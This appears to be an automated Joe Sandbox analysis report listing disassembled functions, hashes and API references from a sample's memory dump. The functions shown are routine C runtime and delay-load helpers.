Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 9038c44085a8a556c1401850349d3b32770b43aa43d96c660ebb7bbcbb30d0f2
Instruction ID: 85c5939fc8d8d4bf4955478f32e1ab395e3f6ed72542ea68e0f6eafb96f6a88c
Opcode Fuzzy Hash: 9038c44085a8a556c1401850349d3b32770b43aa43d96c660ebb7bbcbb30d0f2
Instruction Fuzzy Hash: 70014872504219BBCF02AF90DC06DEE7F67EF08750F014158FE1466260CA368A71EF95

Function 006BAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,006BA56F), ref: 006BAF55

Strings

InitializeCriticalSectionEx, xrefs: 006BAF1B, 006BAF25

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 750cbc9dc3e53e19f91cb9718eec73601b3ea485148c5fcda5283f0bba95a69d
Instruction ID: 17cd466fc3455062ebf95b38125d3a21d8fc084d04758add744c89a50fe23896
Opcode Fuzzy Hash: 750cbc9dc3e53e19f91cb9718eec73601b3ea485148c5fcda5283f0bba95a69d
Instruction Fuzzy Hash: 5AF0B471A45218BFCF025F91CC02DFD7F67EF04B21B018058FD0856260DA314E119B9A

Function 006BADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 006BADEE

Strings

FlsAlloc, xrefs: 006BADC0, 006BADCA

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: e9bddba21bc1bfd467d30b7420dec5f567ef3eb49849cff44f177c45372f0992
Instruction ID: 7f5e99bdfdc2336c1190334a00aefdf01da91d89c73ea46aeeebb68e3e053a2b
Opcode Fuzzy Hash: e9bddba21bc1bfd467d30b7420dec5f567ef3eb49849cff44f177c45372f0992
Instruction Fuzzy Hash: 6CE02B716852187BC701ABA5DC02EBEBB67DF05B21B02019DFC0597340CE719F419BDA

Function 006AE1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: bc49141236ea2d157cddbf274566f96fa7ce673551f50b72336e235829f015dc
Instruction ID: 3ca002a7665c61da0af2aba7262d1e6a45b7be652cbb920bd363abe4d0fb17a1
Opcode Fuzzy Hash: bc49141236ea2d157cddbf274566f96fa7ce673551f50b72336e235829f015dc
Instruction Fuzzy Hash: C0B012E925C114AC3144B1491C82D37014FC1C3B20330403EF80AC0180D8456C010D71

Function 006AE1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: a75cf8bc200760a50608e24d2b0f8cc4a4822b556505bdb6a1f28d216d7d03db
Instruction ID: f4200ab429e6b3fe57bc39b6830a7a9820de8258b7cce30918c0af1887b2a8f0
Opcode Fuzzy Hash: a75cf8bc200760a50608e24d2b0f8cc4a4822b556505bdb6a1f28d216d7d03db
Instruction Fuzzy Hash: CCB012D6258010AC3184B6091C42D37114FC1C3B20330C03EFC0AC0280D845AC050D71

Function 006AE1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: 432f7881fe44bcf34ad2962070d735d5cf5d9fa7ccd7cf1ca467ada607139f0a
Instruction ID: 9b33e4b94e231462cbf61549b76c8c7cd3d941e993138f284bc2bbfce448765d
Opcode Fuzzy Hash: 432f7881fe44bcf34ad2962070d735d5cf5d9fa7ccd7cf1ca467ada607139f0a
Instruction Fuzzy Hash: 7DB012E9258110BC310471451C82C37110FC1C3B20330843EFC06C0480D845AC010C71

Function 006AE26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: 35a4ac3d922d3b1b30dda071486a4cc01a02a36caa5c5a2ac2e2889d4c41e93f
Instruction ID: df323a6916a15d9639afc941f4924416e0e5254cb365270812089779c33ec854
Opcode Fuzzy Hash: 35a4ac3d922d3b1b30dda071486a4cc01a02a36caa5c5a2ac2e2889d4c41e93f
Instruction Fuzzy Hash: 80B012D5258010AC3144B1151D42D37118FC1C3B20330803EFD0AC0180D845EC010C71

Function 006AE264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: b9a625b14cdd7b807c4da7b2604181f4a0a443d584c05cbe9b6fa9ace7b31a9d
Instruction ID: 1e4e2df4578f0661f684bbfb86e1f5269a673e47edf62c465bdf2ec65f477e8f
Opcode Fuzzy Hash: b9a625b14cdd7b807c4da7b2604181f4a0a443d584c05cbe9b6fa9ace7b31a9d
Instruction Fuzzy Hash: 7AB012D5269050AC3144B1051C43D37018FC5C2B20330403EF80BC0180D8456C010C71

Function 006AE246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: 65eb588cbbbd128d692ac7457c6d44c0df46b985ec3f862d8fd2e4820259089b
Instruction ID: 0b7eca8d375bed6577e0ca8fdef401c9005404118bf488dbb968df2b91c4b4e6
Opcode Fuzzy Hash: 65eb588cbbbd128d692ac7457c6d44c0df46b985ec3f862d8fd2e4820259089b
Instruction Fuzzy Hash: B7B012D5259050AC3144B1051C43D37114FC1C3B20330803EFC0AC0180D845AC010C71

Function 006AE250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: 096bb0880a58c4c691f4a4936b2d6fc362e097851df77d6bce377a2e9bc5a92d
Instruction ID: b9b3b3f833420fa701e8227b4ed3d12bbb5590b341715e10355b5ec58f066745
Opcode Fuzzy Hash: 096bb0880a58c4c691f4a4936b2d6fc362e097851df77d6bce377a2e9bc5a92d
Instruction Fuzzy Hash: 61B012E5259150BC3184B2051C43D37014FC1C2B20330413EF80AC0180D8466C450C71

Function 006AE228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: 142c2663fe756766c3b827b3a5201f4ada0217b7fab7b25f44014d0d43e4b19d
Instruction ID: 6b93f7ff1a17bb24820d350e273097d40a61fd4024e26bb4db0e3f3b0edef6d7
Opcode Fuzzy Hash: 142c2663fe756766c3b827b3a5201f4ada0217b7fab7b25f44014d0d43e4b19d
Instruction Fuzzy Hash: CAB012E5258110BC3184B1055C42D37014FC1C3F20330413EF80AC0180D8466D410C71

Function 006AE23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: 1821ba6eb4e21b95379f980c55e6d52072874a0b7e2896607f7ec4b622ec003e
Instruction ID: 82e28b30c49e387c7c48862a90d9130d97d0ec71edd636fb0ecefb0510f360d8
Opcode Fuzzy Hash: 1821ba6eb4e21b95379f980c55e6d52072874a0b7e2896607f7ec4b622ec003e
Instruction Fuzzy Hash: 28B012E5258010AC3144B1065C42D37014FD1C3F20330403EF80AC0180D8456D010C71

Function 006AE232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: 8beead4a833af2750e89bf4d8fe6315e97bc6d495164e9940a3331543fd43b8a
Instruction ID: db81a759cdca183a8b529f5c2d057fddf165e9db60468bd084a3974347651720
Opcode Fuzzy Hash: 8beead4a833af2750e89bf4d8fe6315e97bc6d495164e9940a3331543fd43b8a
Instruction Fuzzy Hash: 62B012E5258010AC3144B1055D42D37014FC1C3F20330403EF80AC0184DC466E120C71

Function 006AE20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD, 006AE20A

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: 529c1848808f42513a92cbe2f6f73fea76a51fd82c2442006b1474198153011b
Instruction ID: 2aa38e404988efa68d29f65f771495bcd7facaf11de00c141119ec51e72fb88d
Opcode Fuzzy Hash: 529c1848808f42513a92cbe2f6f73fea76a51fd82c2442006b1474198153011b
Instruction Fuzzy Hash: A7B012D5258010AC3184B2091D42D37014FC1C2B20330803EF80AC0280DC566D1A0D71

Function 006AE200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: 66d4442e1e4261a76b5f99205add571d926bef5c8401c98dc7814f68c2043d87
Instruction ID: 10123a25e8af70a6c4006a2e56a875d1dbfc4e75b9470c0da1e54685db8e5d36
Opcode Fuzzy Hash: 66d4442e1e4261a76b5f99205add571d926bef5c8401c98dc7814f68c2043d87
Instruction Fuzzy Hash: C3B012D5358150BC31C4B2091C42D37014FC1C2B20330813EF80AC0280D8456C450D71

Function 006AE21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: d91879bf017c495ca77a0b2521feb3fdac47fb0eb0830bfcb504161a96edfbc1
Instruction ID: 5cf3046a2125c6ece975fef90c3df34bc238cafa56bc24b3be07f451fc492317
Opcode Fuzzy Hash: d91879bf017c495ca77a0b2521feb3fdac47fb0eb0830bfcb504161a96edfbc1
Instruction Fuzzy Hash: 98B012E5258010BC3144B1055C42D37114FC1C3F20330803FFC0AC0180D845AD010C71

Function 006AE282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE1E3

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

j, xrefs: 006AE1DD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: j
API String ID: 1269201914-813719372
Opcode ID: 9db194345673a9526baa7c93aca40df39262801a99375e96fc2e80d683a8b31e
